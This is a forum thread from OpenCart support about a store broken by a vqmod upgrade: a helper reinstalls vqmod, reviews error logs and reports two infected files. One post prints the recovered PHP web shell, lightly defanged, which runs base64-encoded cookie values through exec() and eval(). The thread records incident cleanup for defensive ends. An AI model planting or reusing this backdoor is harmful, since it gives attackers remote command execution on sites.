Post by wzch25 » Fri Aug 16, 2013 10:40 pm

I have opencart 1.5.4

my website is www.kikowireless.com

error link - http://kikowireless.com/flip-leather-wa ... 2111230765


I try updating vqmod from 1.01 to the latest version

i get the following error at admin

Notice: Undefined property: MySQL::$connection in /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php on line 38

Warning: mysql_query() expects parameter 2 to be resource, null given in /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php on line 38

I tried replacing the new vqmod files with the backup I have and I am getting the following

Fatal error: Call to undefined method VQMod::bootup() in /home/jwwwakik/public_html/admin/index.php on line 16

please help, only my homepage is up and the rest is down. admin is down as well

I have contacted my host and they said database is good.

Can anyone help me with this??

Thank you

Newbie

Posts

Joined
Mon Oct 01, 2012 12:25 pm

Post by butte » Fri Aug 16, 2013 11:17 pm

A quick detour would be to rename /vqmod/ in order to shut it off, slip into place virgin index.php files (rename the present ones first), and then go into admin.

When you upgraded vqmod itself, did you give it a fresh pair of index.php to modify, and then fire its own installer /vqmod/install/index.php? Is it the correct version, of the two, for OC? (If yes, then in /vqmod/xml/ there will be a newly dated "opencart" .xml file.)

Add the vqmod manager (by rph), it'll relieve several headaches while and after you wrestle with this one. Remember to go into user-group and reset (reselect) "all" permissions, in order to pick up the permissions added for vqmod manager, so that you can use it as top admin.

At the moment, by the way, seen in Firefox 22, the shop is up but choices aren't working, and /admin/ does not show up. Choosing something to click in the shop, and looking for the admin log-in screen, both bring up

Fatal error: Call to undefined method VQMod::bootup() in /home/jwwwakik/public_html/index.php on line 16

which seems to implicate the startup.php but I can't tell. Getting into admin would, of course, be helpful.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by butte » Sat Aug 17, 2013 3:16 am

Resolved. Went in. Required reinstallation of new vqmod from scratch onto virgin index.php pair, de minimus initial .xml pair (opencart, vqmod manager) plus two standby proven utilities (backup, anti-upload), removal of most recent two .xml put into play when "and then it happened," and for the moment sidelining of a further . . . 67 .xml files while choice is rendered to trim list.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by butte » Sat Aug 17, 2013 3:48 am

There were two infections.

(1) aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg.4fff9799fa00fc03eddba1e23a46be48
(2) route.php.jpg.8e9f8d9432cfa2c76c189af36a4ee9a2

Both, now handsomely dead, were browser-addressable in /download/ (as we've seen before). BOTH show this executable mime attack (here modified to nullify execution, ^, lbrace, rbrace, dollarsign, burpecho, and doubled ;;):

<^php
burpecho "Dollarsign#@&\n\n";;

if(isset(Dollarsign_COOKIE['76027405']) && !empty(Dollarsign_COOKIE['76027405'])) lbrace
burpecho htmlentities((string) base64_decode(Dollarsign_COOKIE['76027405']),ENT_QUOTES);;
burpecho "<pre>";;
Dollarsignoutbuf="";Dollarsignoutstr="";exec(base64_decode(Dollarsign_COOKIE['76027405']),Dollarsignoutbuf);;
foreach(Dollarsignoutbuf as Dollarsignval) Dollarsignoutstr.=Dollarsignval."\r\n";echo htmlentities(Dollarsignoutstr);
rbrace elseif(isset(Dollarsign_COOKIE['26312595']) && !empty(Dollarsign_COOKIE['26312595'])) lbrace
burpecho htmlentities((string) base64_decode(Dollarsign_COOKIE['26312595']),ENT_QUOTES);;
burpecho "<pre>";;
eval((string) base64_decode(Dollarsign_COOKIE['26312595']));;
rbrace elseif(isset(Dollarsign_COOKIE['13037085'])) lbrace
phpinfo();;
rbrace

^>

What they do with that is to set up for a prunable pair of extensions to execute the one of choice. They are trying mime attack to read mail and to read data. These do not speak well for the hacker's intelligence quotient, probably about 3, maybe 4.

[EDIT, ADDED, 25th:] How they can execute the extension of choice, or even insert and execute it, is briefly shown at http://forum.opencart.com/viewtopic.php ... 29#p431729
Last edited by butte on Sun Aug 25, 2013 11:23 pm, edited 2 times in total.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by butte » Sat Aug 17, 2013 4:13 am

Okay, he wants all 67 of those 67 .xml, so we shall see between OC and vq extensions who flattens whose tires.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by butte » Sat Aug 17, 2013 4:23 am

Here are two ready examples of why to check error logs.

(1) Pertaining to vqmod_admin_filter_products_by_category_1_5_2_1.xml there were 27 vqmod error log entries, all jul 09, showing the same reiterated problem:
Could not resolve path for [admin/language/croatia/catalog/product.php] (SKIPPED)

Okay, same solution: edit out calls in .xml to Croatian files

There are at least a few .xml authors who stuff in calls to Croatian files which are either not in the package or are deleted by people who have no reason to want Croatian files.

(2) Today typical set of 5 entries per iteration showed a persistent session problem:
2013-08-16 10:15:24 - PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php:38) in /home/jwwwakik/public_html/system/library/session.php on line 11
2013-08-16 10:18:03 - PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php:38) in /home/jwwwakik/public_html/system/library/session.php on line 11
2013-08-16 10:18:04 - PHP Warning: session_start() [<a href='function.session-start'>function.session-start</a>]: Cannot send session cache limiter - headers already sent (output started at /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php:38) in /home/jwwwakik/public_html/system/library/session.php on line 11
2013-08-16 10:18:05 - PHP Warning: Cannot modify header information - headers already sent by (output started at /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php:38) in /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 28
2013-08-16 10:18:05 - PHP Warning: Cannot modify header information - headers already sent by (output started at /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_database_mysql.php:38) in /home/jwwwakik/public_html/vqmod/vqcache/vq2-system_engine_controller.php on line 29

THEN WITH VQMOD SHUT OFF there were no further errors. THEN with vqmod reinstalled there were STILL no further errors.

'Twas nice to know, before, during, and afterward, what the machine thought about vqmod.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am

Post by butte » Sat Aug 17, 2013 1:55 pm

And now we have some flattened tires, among the six dozen extensions enabled in concert. Five .xml files' timestamps and sizes changed since then, and have now been disabled for the night. (The server supports preservation of timestamps in ftp.) There were meanwhile 671 errors thrown in spurts by the system but none by vqmod, at rates of 1.5 or so per second, among three different errors, including category, product, and search calls which probably relate to robotic activity, plus another very few iterations of three or so further errors in virtually single-shot doublets, triplets, or similar.

Guru Member

Posts

Joined
Wed Mar 20, 2013 6:58 am
Who is online

Users browsing this forum: No registered users and 19 guests